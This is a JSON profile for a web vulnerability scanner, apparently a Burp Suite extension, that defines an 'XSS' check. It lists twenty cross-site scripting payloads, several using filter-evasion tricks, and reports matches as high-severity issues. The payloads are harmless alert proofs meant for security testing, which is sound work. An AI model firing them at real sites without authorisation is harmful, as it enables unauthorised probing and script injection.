[
 {
  "Name": "XSS", 
  "Active": false, 
  "Scanner": 1, 
  "Payloads": [
   "</script><script>confirm(1)</script>", 
   "\"><img src=x onerror=prompt(1);>.", 
   "<SCRIPT>a=/XSS/.alert(a.source)</SCRIPT>", 
   "<svg oNLoAd=alert('XSS')>", 
   "<svg/oNLoAd=alert(1)>", 
   "\"><SCRIPT>a=/XSS/.alert(a.source)</SCRIPT><!--", 
   "<svg><script>alert&#40/1/.source&#41</script></svg>", 
   "javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/\"/+/onmouseover=1/+/[*/[]/+alert(11)//'>", 
   "<svg </onload =\"1> (_=alert,\n\n_(1337)) \"\">", 
   "<marquee loop=1 width=0 onfinish=alert(2)>", 
   "/<meta/content=\"0;url=data:text/html;base64,\n\nPHNjcmlwdD5hbGVydCgxMzM3KTwvc2NyaXB0Pg==\"http-equiv=refresh>", 
   "<svg%0conload=alert(1)>", 
   "<svg%0aonload=alert(1)>", 
   "<svg%09onload=alert(1)>", 
   "<svg%0donload=alert(1)>", 
   "<svg%10onload=alert(1)>", 
   "<svg%13onload=alert(1)>", 
   "<svg\\/onload=(alert('XSS'))>", 
   "<?PXML><html:script>alert(1234)</html:script>", 
   "<a:script xmlns:a=\"http://www.w3.org/1999/xhtml\">alert(1)</a:script>"
  ], 
  "Encoder": [], 
  "UrlEncode": false, 
  "CharsToUrlEncode": "", 
  "SearchString": "", 
  "ReplaceString": "", 
  "Grep": [], 
  "PayloadResponse": false, 
  "NotResponse": false, 
  "NotCookie": false, 
  "CaseSensitive": false, 
  "ExcludeHTTP": false, 
  "OnlyHTTP": false, 
  "IsContentType": false, 
  "ContentType": "", 
  "IsResponseCode": false, 
  "ResponseCode": "", 
  "MatchType": 3, 
  "IssueName": "XSS", 
  "IssueSeverity": "High", 
  "IssueConfidence": "Certain", 
  "IssueDetail": "XSS en con el payload:   <grep>", 
  "RemediationDetail": "", 
  "IssueBackground": "", 
  "RemediationBackground": ""
 }
]